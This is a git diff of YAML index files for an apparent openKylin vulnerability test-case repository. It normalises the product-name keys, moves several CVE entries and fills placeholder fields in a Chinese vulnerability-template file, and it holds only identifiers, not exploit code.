a/openkylin_list.yaml b/openkylin_list.yaml index 34ad6d59..a6752cda 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -1,13 +1,13 @@ #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。 cve: - apache: + apache-Httpd: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - apache-APISIX: + apache-Apisix: - CVE-2022-24112 - CVE-2021-45232 - apache-activemq: + apache-Activemq: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 @@ -22,32 +22,31 @@ cve: - CVE-2021-26295 apache-Airflow: - CVE-2020-11978 - apache-log4j: + apache-Log4j: - CVE-2021-44228 - apache-solr: + apache-Solr: - CVE-2021-27905 - CVE-2019-0193 - apache-tomcat: + apache-Tomcat: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 - CVE-2017-12617 + - CVE-2020-13935 apache-Spark: - CVE-2022-33891 apache-Flink: - CVE-2020-17518 - apache-tomcat: - - CVE-2020-13935 - apache-unomi: + apache-Unomi: - CVE-2020-13942 - apache-struts: + apache-Struts: - CVE-2019-0230 apache-Shiro: - CVE-2022-32532 - Influx-DB: - - CVE-2019-20933 apache-Commons: - CVE-2022-33980 + influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -170,17 +169,19 @@ cve: - CVE-2022-22965 - CVE-2022-22963 - CVE-2022-31692 + java-SE: + - CVE-2022-21449 webmin: - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 - CVE-2019-15107 - Zimbra: + zimbra: - CVE-2022-27925 - CVE-2022-37042 - Grafana: + grafana: - CVE-2021-43798 - Froxlor: + froxlor: - CVE-2021-42325 - CVE-2023-0315 - CVE-2023-0877 @@ -197,5 +198,4 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 - Java-SE: - - CVE-2022-21449 + diff --git a/other_list.yaml b/other_list.yaml index bf286e5e..ea925499 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,11 +19,11 @@ cve: - CVE-2017-16995 polkit: - CVE-2021-3560 - Outlook: + outlook: - CVE-2023-23397 redis: - CVE-2022-0543 - EsFileExplorer: + esFileExplorer: - CVE-2019-6447 docker: - CVE-2019-5736 @@ -47,27 +47,25 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 - MinIO: + minIO: - CVE-2023-28432 - CVE-2023-28434 - WebLogic: + webLogic: - CVE-2023-21839 - Node.js: + node.js: - CVE-2021-21315 zabbix: - CVE-2022-23131 weblogic: - CVE-2022-2555 - CVE-2021-2109 - Zyxel: + zyxel: - CVE-2022-30525 - Gitlab: + gitlab: - CVE-2022-1175 -cnvd: - WordPress: + wordPress: - CVE-2019-8942 - CVE-2023-23488 - Zimbra: + zimbra: - CVE-2022-41352 cnvd: - diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71..1de22702 100644 --- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -10,10 +10,10 @@ info: reference: - 漏洞相关链接 classification: - cvss-metrics: CVSS:3.1 + cvss-metrics: CVSS向量 cvss-score: 漏洞评分 - cve-id: - cwe-id: - cnvd-id: - kve-id: + cve-id: CVE漏洞编号 + cwe-id: CWE编号 + cnvd-id: CNVD编号 + kve-id: KVE编号 tags: 漏洞标签 \ No newline at end of file -- Gitee